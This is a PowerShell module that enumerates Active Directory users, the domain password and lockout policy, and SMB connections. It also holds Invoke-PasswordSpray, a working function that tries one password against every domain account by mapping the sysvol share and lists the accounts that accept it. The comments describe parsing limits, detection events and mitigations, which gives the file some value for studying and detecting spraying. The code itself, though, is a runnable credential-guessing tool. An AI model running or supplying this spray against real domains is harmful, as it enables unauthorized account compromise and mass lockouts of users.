net.psm1
Function Get-DomainUsers(){
    <#
    .SYNOPSIS
    Returns the account names printed by `net user /domain` as individual strings.
    .DESCRIPTION
    Runs `net user /domain`, keeps the lines from index 6 through the
    third-from-last line, splits those lines on runs of whitespace and drops
    the empty tokens that the split leaves behind.
    .OUTPUTS
    System.String - one per whitespace-separated token found in the kept lines.
    .NOTES
    The slice offsets are fixed, so the result depends on the exact layout of
    the net.exe output. Because the split is on whitespace, an account name
    that contains a space comes back as separate tokens.
    For monitoring: the call is a net.exe process with the arguments
    `user /domain`, which process-creation logging that records command lines
    (e.g. Security event 4688, Sysmon event 1) will show.
    #>
    $netLines = net user /domain
    $lastKept = $netLines.length - 3
    $tokens = $netLines[6..$lastKept] -split "\s+"
    # Padding between the name columns yields empty strings; keep real tokens only.
    $UserNames = $tokens | Where-Object { $_ }
    $UserNames
}
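Function Get-DomainPasswordPolicy(){
    <#
    .SYNOPSIS
    Parses `net accounts /domain` into one object holding the domain password
    and lockout policy values.
    .DESCRIPTION
    Drops the first two and last two lines of the command output and reads the
    next nine lines by position, taking the text after the first ':' on each.
    .OUTPUTS
    PSObject with string properties ForceUserLogOff, MinPwAge, MaxPwAge,
    MinPwLength, PwHistory, LOThreshold, LODuration, LOWindow and CompRole.
    Nothing is returned (and an error is written) when the output is too short
    to contain the nine policy lines.
    .NOTES
    Values are mapped by line position, not by label, so the result is only
    correct when net.exe prints the nine settings in this order.
    #>
    $raw = @(net accounts /domain)

    # 2 header lines + 9 policy lines + 2 trailer lines. With fewer lines the
    # slice below would run backwards or index past the end.
    if ($raw.Count -lt 13) {
        Write-Error "net accounts /domain returned $($raw.Count) line(s); expected at least 13, output not parsed."
        return
    }

    # Split once instead of once per property.
    $lines = $raw[2..($raw.Count - 3)] -split '[\r\n]'

    # Text after the first ':' on each of the nine policy lines, trimmed.
    $values = foreach ($line in $lines[0..8]) { ($line.split(':')[1]).trim() }

    # The original emitted a misspelled, undefined variable here, which put a
    # $null in front of the result object; only the object is returned now.
    $props = @{
        ForceUserLogOff = $values[0]
        MinPwAge        = $values[1]
        MaxPwAge        = $values[2]
        MinPwLength     = $values[3]
        PwHistory       = $values[4]
        LOThreshold     = $values[5]
        LODuration      = $values[6]
        LOWindow        = $values[7]
        CompRole        = $values[8]
    }
    return New-Object PSObject -property $props
}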
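Function Get-SMBConnections(){
    <#
    .SYNOPSIS
    Parses the table printed by `net use` into one object per connection.
    .DESCRIPTION
    Keeps the lines from index 6 through the third-from-last line of the
    command output, drops empty lines, and splits each remaining line on runs
    of two or more whitespace characters into its first four columns.
    .OUTPUTS
    PSCustomObject with properties Status, DriveLetter, UNCPath and Type, one
    per table row. Nothing is returned when the output has no table rows.
    .NOTES
    Columns are taken by position, so a row with a missing column shifts the
    later values to the left.
    #>
    $raw = @(net use)

    # Six header lines and two trailer lines surround the table. With fewer
    # than nine lines there is no row, and 6..($raw.Count - 3) would count
    # backwards and pick up message text as if it were a connection.
    if ($raw.Count -lt 9) { return }

    $rows = ($raw[6..($raw.Count - 3)] -split '[\r\n]') | Where-Object { $_ }

    foreach ($line in $rows) {
        # Split each row once; single spaces inside a column are preserved.
        $cols = $line -split '\s\s+'
        [PSCustomObject]@{
            'Status'      = $cols[0]
            'DriveLetter' = $cols[1]
            'UNCPath'     = $cols[2]
            'Type'        = $cols[3]
        }
    }
}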
Function Invoke-PasswordSpray(){
<#
.SYNOPSIS
Tries one password against every name returned by Get-DomainUsers by mapping
the domain's sysvol share to a drive letter with those credentials.
.PARAMETER Password
The single password tried for every account. It is a plain [string], so it
appears in the command line as typed and in each result string.
.PARAMETER DriveLetter
Drive letter used for the temporary mapping. It is compared with
Win32_LogicalDisk.DeviceID, so presumably it must include the colon (e.g. 'Z:').
.OUTPUTS
System.String - "<name>@<domain> Is using Password <Password>" for each
account whose mapping attempt did not throw.
.NOTES
Detection: every rejected mapping is a failed authentication for a different
account from the same host within a short time. On domain controllers this
typically shows up as a burst of failed-logon events (4625, 4771 or 4776)
with many distinct target accounts and one common source. With PowerShell
script block logging enabled (event 4104) the invocation is recorded.
Mitigation: an account lockout threshold, banned-password lists and
multi-factor authentication reduce what a single-password sweep can find.
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True)]
[string]$Password,
[parameter(Mandatory=$True)]
[string]$DriveLetter
)
# DriveCheck returns the network drive (Win32_LogicalDisk DriveType = 4) whose
# DeviceID equals $DriveLetter, or nothing when that letter is not mapped.
Function DriveCheck(){$output = Get-WMIObject -query 'Select * From Win32_LogicalDisk Where DriveType = 4' | Select-Object DeviceID, ProviderName|where {$_.DeviceID -eq $DriveLetter};$output}
# NOTE(review): '-eq !Null' is parsed as arguments to DriveCheck, not as a
# comparison, so this condition appears to be just "DriveCheck returned
# something" - confirm. If so, an existing mapping on the letter is removed
# (second argument 1 = force) before the loop starts.
if (Drivecheck -eq !Null){(New-Object -ComObject WScript.Network).RemoveNetworkDrive($DriveLetter, 1)}
$usernames = get-domainusers
# Target is \\<domain of this computer>\sysvol.
$UNCPath = '\\' + (Get-WmiObject Win32_ComputerSystem).Domain + '\sysvol'
write-host Testing Passwords to $UNCPath
$array01 = @()
foreach($name in $usernames){
# Build name@domain; the domain is queried from WMI again on every iteration.
$name = $name + '@' + (Get-WmiObject Win32_ComputerSystem).Domain
$net = new-object -ComObject WScript.Network
try{
# Third argument $false: the mapping is not saved to the user profile.
$net.MapNetworkDrive($DriveLetter, $UNCPath, $false, $name, $password)
}
# Any exception from MapNetworkDrive, not only rejected credentials, skips to
# the next name without being reported.
catch {Continue}
# Reached only when the mapping call did not throw; the recorded string
# contains the password in clear text.
$var = $name + ' Is using Password ' + $Password
$array01 += $var
# Remove the mapping again so the same drive letter is free for the next name.
if (Drivecheck -eq !Null){(New-Object -ComObject WScript.Network).RemoveNetworkDrive($DriveLetter, 1)}
}
$array01
}